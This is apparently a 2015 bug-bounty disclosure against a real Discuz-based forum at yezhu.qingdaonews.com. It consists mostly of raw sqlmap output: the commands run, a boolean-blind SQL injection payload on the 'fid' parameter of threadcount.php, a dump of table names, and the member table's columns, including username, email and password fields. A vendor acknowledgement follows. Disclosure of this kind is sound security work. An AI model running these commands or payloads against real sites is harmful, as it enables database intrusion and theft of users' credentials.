pre_common_member_profile || pre_common_member_profile_archive || pre_common_member_profile_setting || pre_common_member_security || pre_common_member_secwhite || pre_common_member_stat_field || pre_common_member_stat_fieldcache || pre_common_member_stat_search || pre_common_member_stat_searchcache || pre_common_member_status || pre_common_member_status_archive || pre_common_member_validate || pre_common_member_verify || pre_common_member_verify_info || pre_common_member_wechat || pre_common_member_wechatmp || pre_common_moderate || pre_common_myapp || pre_common_myinvite || pre_common_mytask || pre_common_nav || pre_common_onlinetime || pre_common_optimizer || pre_common_patch || pre_common_plugin || pre_common_pluginvar || pre_common_process || pre_common_regip || pre_common_relatedlink || pre_common_remote_port || pre_common_report || pre_common_searchindex || pre_common_seccheck || pre_common_secquestion || pre_common_session || pre_common_setting || pre_common_smiley || pre_common_sphinxcounter || pre_common_stat || pre_common_statuser || pre_common_style || pre_common_stylevar || pre_common_syscache || pre_common_tag || pre_common_tagitem || pre_common_task || pre_common_taskvar || pre_common_template || pre_common_template_block || pre_common_template_permission || pre_common_uin_black || pre_common_usergroup || pre_common_usergroup_field || pre_common_visit || pre_common_word || pre_common_word_type || pre_connect_disktask || pre_connect_feedlog || pre_connect_memberbindlog || pre_connect_postfeedlog || pre_connect_tthreadlog || pre_dsu_paulsign || pre_dsu_paulsignemot || pre_dsu_paulsignset || pre_dzp || pre_dzp_jp || pre_forum_access || pre_forum_activity || pre_forum_activityapply || pre_forum_announcement || pre_forum_attachment || pre_forum_attachment_0 || pre_forum_attachment_1 || pre_forum_attachment_2 || pre_forum_attachment_3 || pre_forum_attachment_4 || pre_forum_attachment_5 || pre_forum_attachment_6 || pre_forum_attachment_7 || 
+---------------------------------------+

[15:35:15] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/yezhu.qingdaonews.com'

[*] shutting down at 15:35:15

root@root:~# sqlmap -u http://yezhu.qingdaonews.com/threadcount.php?fid=656--columns -T pre_common_member -D ultrax3

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:36:03

[14:36:03] [INFO] resuming back-end DBMS 'mysql'
[14:36:03] [INFO] testing connection to the target URL
[14:36:04] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: fid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fid=656' AND 5921=5921 AND 'QYrB'='QYrB
---
[14:36:04] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.25
back-end DBMS: MySQL 5
[14:36:04] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/yezhu.qingdaonews.com'

[*] shutting down at 14:36:04

root@root:~# sqlmap -u http://yezhu.qingdaonews.com/threadcount.php?fid=656 --columns -T pre_common_member -D ultrax3

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:36:43

[14:36:44] [INFO] resuming back-end DBMS 'mysql'
[14:36:44] [INFO] testing connection to the target URL
[14:36:44] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: fid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fid=656' AND 5921=5921 AND 'QYrB'='QYrB
---
[14:36:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.25
back-end DBMS: MySQL 5
[14:36:44] [INFO] fetching columns for table 'pre_common_member' in database 'ultrax3'
[14:36:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:36:44] [INFO] retrieved: 25
[14:36:45] [INFO] retrieved: uid
[14:36:49] [INFO] retrieved: mediumint(8) unsigned
[14:36:58] [INFO] retrieved: xiaoqu
[14:37:00] [INFO] retrieved: varchar(100)
[14:37:06] [INFO] retrieved: email
[14:37:08] [INFO] retrieved: char(40)
[14:37:12] [INFO] retrieved: username
[14:37:16] [INFO] retrieved: char(15)
[14:37:20] [INFO] retrieved: password
[14:37:26] [INFO] retrieved: char(32)
[14:37:29] [INFO] retrieved: status
[14:37:32] [INFO] retrieved: tinyint(1)
[14:37:36] [INFO] retrieved: emailstatus
[14:37:43] [INFO] retrieved: tinyint(1)
[14:37:48] [INFO] retrieved: avatarstatus
[14:37:54] [INFO] retrieved: tinyint(1)
[14:37:58] [INFO] retrieved: videophotostatus
[14:38:05] [INFO] retrieved: tinyint(1)
[14:38:12] [INFO] retrieved: adminid
[14:38:16] [INFO] retrieved: tinyint(1)
[14:38:20] [INFO] retrieved: groupid
[14:38:24] [INFO] retrieved: smallint(6) unsigned
[14:38:33] [INFO] retrieved: groupexpiry
[14:38:38] [INFO] retrieved: int(10) unsigned
[14:38:45] [INFO] retrieved: extgroupids
[14:38:50] [INFO] retrieved: char(20)
[14:38:53] [INFO] retrieved: regdate
[14:38:56] [INFO] retrieved: int(10) unsigned
[14:39:07] [INFO] retrieved: credits
[14:39:13] [INFO] retrieved: int(10)
[14:39:16] [INFO] retrieved: notifysound
[14:39:20] [INFO] retrieved: tinyint(1)
[14:39:26] [INFO] retrieved: timeoffset
[14:39:30] [INFO] retrieved: char(4)
[14:39:34] [INFO] retrieved: newpm
[14:39:37] [INFO] retrieved: smallint(6) unsigned
[14:39:44] [INFO] retrieved: newprompt
[14:39:48] [INFO] retrieved: smallint(6) unsigned
[14:39:57] [INFO] retrieved: accessmasks
[14:40:07] [INFO] retrieved: tinyint(1)
[14:40:16] [INFO] retrieved: allowadmincp
[14:40:21] [INFO] retrieved: tinyint(1)
[14:40:25] [INFO] retrieved: onlyacceptfriendpm
[14:40:35] [INFO] retrieved: tinyint(1)
[14:40:47] [INFO] retrieved: conisbind
[14:41:05] [INFO] retrieved: tinyint(1) unsigned
[14:41:19] [INFO] retrieved: freeze
[14:41:22] [INFO] retrieved: tinyint(1)
[14:41:26] [INFO] retrieved: if_robot
[14:41:29] [INFO] retrieved: tinyint(1)
Database: ultrax3
Table: pre_common_member
[25 columns]
+--------------------+-----------------------+
| Column             | Type                  |
+--------------------+-----------------------+
| accessmasks        | tinyint(1)            |
| adminid            | tinyint(1)            |
| allowadmincp       | tinyint(1)            |
| avatarstatus       | tinyint(1)            |
| conisbind          | tinyint(1) unsigned   |
| credits            | int(10)               |
| email              | char(40)              |
| emailstatus        | tinyint(1)            |
| extgroupids        | char(20)              |
| freeze             | tinyint(1)            |
| groupexpiry        | int(10) unsigned      |
| groupid            | smallint(6) unsigned  |
| if_robot           | tinyint(1)            |
| newpm              | smallint(6) unsigned  |
| newprompt          | smallint(6) unsigned  |
| notifysound        | tinyint(1)            |
| onlyacceptfriendpm | tinyint(1)            |
| password           | char(32)              |
| regdate            | int(10) unsigned      |
| status             | tinyint(1)            |
| timeoffset         | char(4)               |
| uid                | mediumint(8) unsigned |
| username           | char(15)              |
| videophotostatus   | tinyint(1)            |
| xiaoqu             | varchar(100)          |
+--------------------+-----------------------+

[14:41:35] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/yezhu.qingdaonews.com'

[*] shutting down at 14:41:35

root@root:~#
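What the devil? I don't know?
Severity: High
Vulnerability Rank: 11
Confirmed at: 2015-09-15 10:02
Thanks, 大白. This forum runs on Discuz, and the developers have done some secondary development on it; vulnerabilities have always been a problem.
None yet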